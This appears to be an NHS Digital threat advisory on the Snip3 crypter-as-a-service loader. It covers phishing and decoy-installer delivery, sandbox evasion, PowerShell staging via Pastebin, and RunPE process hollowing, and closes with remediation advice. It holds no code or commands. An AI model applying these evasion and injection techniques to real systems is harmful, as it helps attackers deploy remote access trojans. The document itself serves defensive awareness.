Snip3 RAT Loader
Snip3 is a Crypter-as-a-Service which includes a loader that has been involved in some recent campaigns involving RevengeRAT and AsyncRAT.
Summary
Snip3 is a Crypter-as-a-Service which includes a loader that has been involved in some recent campaigns involving RevengeRAT and AsyncRAT.
Affected platforms
The following platforms are known to be affected:
Threat details
Introduction
First observed in February 2021, Snip3 is a loader and sophisticated Crypter-as-a-Service that delivers several remote access trojans (RAT) onto target machines. Snip3 has been recently attributed to RevengeRAT and AsyncRAT which have been involved in spear phishing email campaigns.
Delivery
The Snip3 RAT crypter is commonly delivered through phishing emails, however has been seen to be distributed through a large install file; one being a decoy Adobe installer. The crypter uses advanced techniques to avoid detection including checking the existence of VMWare and Windows Sandbox virtualisation, using Pastebin and top4top for staging and executing PowerShell script using the RemoteSigned parameter. There are different variants that have been detected. They all use a VB script that decodes a PowerShell script and then downloads, saves, and executes a second stage PowerShell script.
Activities
Once Snip3 has been deployed, the payload is injected into a running InstallUtil.exe or RegSvcs.exe process. This uses a RunPE technique to modify the memory contents. To help evade detection the RunPE method is embedded as compressed source code and compiled at runtime. Once compiled, PowerShell is then used to load and execute the RunPE function along with the RAT payload. The final payload is executed in the hollowed process memory.
Remediation advice
To prevent and detect an infection, NHS Digital advises that:
- Secure configurations are applied to all devices.
- Security updates are applied at the earliest opportunity.
- Tamper protection settings in security products are enabled where available.
- Obsolete platforms are segregated from the rest of the network.
- IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
- Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
- Administrative accounts are only used for necessary purposes.
- Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
- Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.
Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.
Indicators of compromise
Last edited: 20 May 2021 5:19 pm